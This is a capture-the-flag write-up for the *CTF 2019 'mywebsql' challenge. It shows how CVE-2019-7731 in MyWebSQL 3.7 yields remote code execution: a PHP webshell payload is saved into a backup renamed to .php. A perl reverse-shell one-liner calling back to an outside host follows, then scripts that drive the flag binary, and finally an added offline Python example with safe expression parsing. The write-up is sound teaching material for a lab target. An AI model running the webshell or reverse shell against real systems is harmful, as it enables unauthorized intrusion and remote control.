*CTF 2019 - Write-up

Information

CTF

  • Name : *CTF 2019
  • Website : wpictf.xyz
  • Type : Online
  • Format : Jeopardy
  • CTF Time : link

mywebsql - Web

http://34.92.36.201:10080/

OSINT

Let's find intel about MyWebSQL. We can look for:

  • MyWebSQL 3.7 Backup Archive File Remote Code Execution
  • CVE-2019-7731 exploit

And finally I found some links:

Exploit

Now that I found the PoC of CVE-2019-7731, let's exploit it:

  1. Log in to the WebUI with admin/admin.
  2. Create a table noraj.
  3. Create an entry with value <?php system($_GET[cmd]); ?>
  4. Use the Backup Database feature and rename the backup file to noraj.php.
  5. Go to http://34.92.36.201:10080/backups/noraj.php?cmd=id and execute commands in our fresh webshell.

Read the flag

Let's try cmd=/readflag | base64

$ printf %s 'U29sdmUgdGhlIGVhc3kgY2hhbGxlbmdlIGZpcnN0CigoKCgoLTk4OTczMyktKC0zNjMxMjEpKS0oLTI3OTQwMSkpKygyNTE2MjApKS0oLTUxNzMyOSkpCmlucHV0IHlvdXIgYW5zd2VyOiBjYWxjdWxhdGUgZXJyb3IhCg==' | base64 -d
Solve the easy challenge first
(((((-989733)-(-363121))-(-279401))+(251620))-(-517329))
input your answer: calculate error!
$ irb
irb(main):001:0> (((((-989733)-(-363121))-(-279401))+(251620))-(-517329))
=> 421738

But the binary that reads the flag seems to require interactivity. It reads the protected /flag.

Let's get the binary locally: cmd=cat /readflag | base64 | tr -d "\n".

Even though it was not required, I managed to get a reverse shell with perl:

perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"<IP>:<PORT>");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

Then my mate 0xUKN remembered a CTF challenge that was similar (interact with a binary from a non-interactive shell).

It was the l33t-hoster challenge from Insomni'hack teaser 2019.

As perl is available on the server and my perl reverse shell worked fine, I chose to re-use the solution from the CTF team GoN (https://github.com/mdsnins/ctf-writeups/blob/master/2019/Insomnihack 2019/l33t-hoster/l33t-hoster.md), which used a perl script to interact with the binary's I/O.

I first tried to inline it and execute it as a one-liner with perl -e.

perl -e 'use warnings;use strict;use IPC::Open2;$| = 1;chdir "/";my $pid = open2(\*out2, \*in2, "/readflag") or die;my $reply = <out2>;print STDOUT $reply;$reply = <out2>;print STDOUT $reply;my $answer = eval($reply);print STDOUT "answer: $answer\n"; print in2 " $answer ";in2->flush();$reply = <out2>;print STDOUT $reply;'

This worked, but the flag was not printed because it was written to STDERR rather than STDOUT.

So I wrote the perl script in a file and executed the script redirecting STDERR to STDOUT:

$ printf %s 'use warnings;use strict;use IPC::Open2;$| = 1;chdir "/";my $pid = open2(\*out2, \*in2, "/readflag") or die;my $reply = <out2>;print STDOUT $reply;$reply = <out2>;print STDOUT $reply;my $answer = eval($reply);print STDOUT "answer: $answer\n"; print in2 " $answer ";in2->flush();$reply = <out2>;print STDOUT $reply;' > noraj.pl
$ perl noraj.pl > s3 2>&1
$ cat s3
*CTF{h4E9PKLkr6HTO3JcRglVdYaBSA0eDU8y}
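The same driver pattern (read the banner and the expression, compute the answer, write it to the child's stdin, then collect the rest with STDERR merged into STDOUT), as an added example in Python rather than the author's perl script. Two things differ from the write-up: the target is a constructed stand-in for /readflag (same prompt shape, placeholder flag) so the example runs offline, and the expression is evaluated through an AST whitelist instead of eval(), because a program's output is untrusted input to the driver and a bare eval() would turn a hostile prompt into code execution on the operator's side. The names drive_readflag, safe_arith and CHILD_SRC are this example's own.

```python
"""Drive an interactive prompt/answer binary over pipes, STDERR merged into
STDOUT, answering its arithmetic question without using eval().

Added example for this write-up, not the author's perl script. The child
program below is a constructed stand-in for /readflag, so everything here
runs offline.
"""
import ast
import operator
import re
import subprocess
import sys

# Constructed stand-in for the challenge binary: prints a banner and an
# arithmetic expression, reads an answer, and writes the flag to STDERR
# (which is why the write-up needed `2>&1` to see it).
CHILD_SRC = r'''
import sys
expr = "(((((-989733)-(-363121))-(-279401))+(251620))-(-517329))"
expected = (((((-989733)-(-363121))-(-279401))+(251620))-(-517329))
print("Solve the easy challenge first", flush=True)
print(expr, flush=True)
sys.stdout.write("input your answer: ")
sys.stdout.flush()
answer = sys.stdin.readline().strip()
if answer == str(expected):
    print("CTF{constructed_placeholder_flag}", file=sys.stderr, flush=True)
else:
    print("calculate error!", flush=True)
'''

# Whitelist: integer literals, unary minus, +, - and *. Names, calls and
# attribute access are rejected, so hostile program output cannot become
# code execution in the driver.
_OPS = {
    ast.Add: operator.add,
    ast.Sub: operator.sub,
    ast.Mult: operator.mul,
    ast.USub: operator.neg,
}


def safe_arith(expr: str) -> int:
    """Evaluate a parenthesised integer expression via an AST whitelist."""
    def ev(node: ast.AST) -> int:
        if isinstance(node, ast.Expression):
            return ev(node.body)
        if isinstance(node, ast.Constant) and type(node.value) is int:
            return node.value
        if isinstance(node, ast.UnaryOp) and type(node.op) in _OPS:
            return _OPS[type(node.op)](ev(node.operand))
        if isinstance(node, ast.BinOp) and type(node.op) in _OPS:
            return _OPS[type(node.op)](ev(node.left), ev(node.right))
        raise ValueError(f"unsupported syntax: {type(node).__name__}")
    return ev(ast.parse(expr.strip(), mode="eval"))


def drive_readflag(cmd=None, answer_override=None) -> dict:
    """Run `cmd`, answer its arithmetic prompt, return answer/output/flag.

    `answer_override` forces a (wrong) answer to exercise the failure path.
    """
    if cmd is None:
        cmd = [sys.executable, "-c", CHILD_SRC]
    proc = subprocess.Popen(cmd, stdin=subprocess.PIPE, stdout=subprocess.PIPE,
                            stderr=subprocess.STDOUT, text=True, bufsize=1)
    banner = proc.stdout.readline()   # "Solve the easy challenge first"
    expr = proc.stdout.readline()     # the expression line
    answer = safe_arith(expr) if answer_override is None else answer_override
    proc.stdin.write(f"{answer}\n")
    proc.stdin.flush()
    # The prompt has no trailing newline, so read to EOF rather than by line.
    # (Not communicate(): it bypasses the text buffer readline() filled.)
    rest = proc.stdout.read()
    proc.stdin.close()
    proc.wait()
    output = banner + expr + rest
    m = re.search(r"CTF\{[^}]*\}", output)
    return {"answer": answer, "output": output, "flag": m.group(0) if m else None}


if __name__ == "__main__":
    result = drive_readflag()
    print(result["output"], end="")
    print("flag:", result["flag"])
```

Reading the remainder with `proc.stdout.read()` rather than `communicate()` matters: after `readline()` the text wrapper may already hold the prompt in its buffer, and `communicate()` reads the raw descriptor, silently dropping it.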